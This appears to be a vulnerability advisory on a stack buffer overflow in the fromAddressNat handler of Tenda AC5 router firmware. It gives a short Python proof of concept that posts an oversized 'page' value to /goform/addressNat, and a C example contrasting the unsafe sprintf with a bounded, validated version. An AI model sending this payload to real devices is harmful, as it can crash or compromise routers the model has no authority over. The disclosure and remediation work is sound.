AC5 V1.0 V15.03.06.47
The Tenda AC5 V1.0 V15.03.06.47 firmware has a stack-based buffer overflow in the fromAddressNat function. The v3 variable receives the page parameter from a POST request. That value is passed directly to sprintf, which writes it into a local variable on the stack and can overwrite the function's return address. A user-supplied page value can therefore trigger the vulnerability.

```python
import requests

# Address of the device under test
ip = "192.168.84.101"
url = "http://" + ip + "/goform/addressNat"

# Oversized value for the "page" parameter
payload = b"a" * 2000
data = {"page": payload}

response = requests.post(url, data=data)
print(response.text)
```
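
The unbounded sprintf pattern described above, next to a bounded replacement, as an added example that is not the firmware's code. The format string, the buffer size, the digit limit and the function names are assumptions made for illustration, as is treating page as a numeric index.

```c
#include <stdio.h>
#include <string.h>

#define REDIRECT_BUF 256   /* assumed size; the page does not give the real one */
#define PAGE_MAX_DIGITS 5  /* assumed upper bound for a page index */

/* Pattern described above, kept for comparison and never called here:
 * sprintf() copies every byte of `page`, however long, into `dst`. */
void build_redirect_unsafe(char *dst, const char *page)
{
    sprintf(dst, "addressNat.asp?page=%s", page); /* hypothetical format */
}

/* Hardened form: validate the parameter, then format with an explicit bound.
 * Returns 0 on success, -1 if the input is rejected or would not fit. */
int build_redirect_safe(char *dst, size_t dst_len, const char *page)
{
    size_t i;
    int n;

    if (page == NULL || dst == NULL || dst_len == 0)
        return -1;
    /* Accept only a short run of decimal digits. */
    for (i = 0; page[i] != '\0'; i++) {
        if (i >= PAGE_MAX_DIGITS || page[i] < '0' || page[i] > '9')
            return -1;
    }
    if (i == 0)
        return -1;
    /* snprintf() never writes past dst_len; a return >= dst_len means truncation. */
    n = snprintf(dst, dst_len, "addressNat.asp?page=%s", page);
    if (n < 0 || (size_t)n >= dst_len) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char out[REDIRECT_BUF];
    char oversized[2001];            /* constructed input, 2000 bytes of 'a' */

    memset(oversized, 'a', 2000);
    oversized[2000] = '\0';
    printf("\"3\" -> %d\n", build_redirect_safe(out, sizeof out, "3"));
    printf("2000 x 'a' -> %d\n", build_redirect_safe(out, sizeof out, oversized));
    return 0;
}
```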
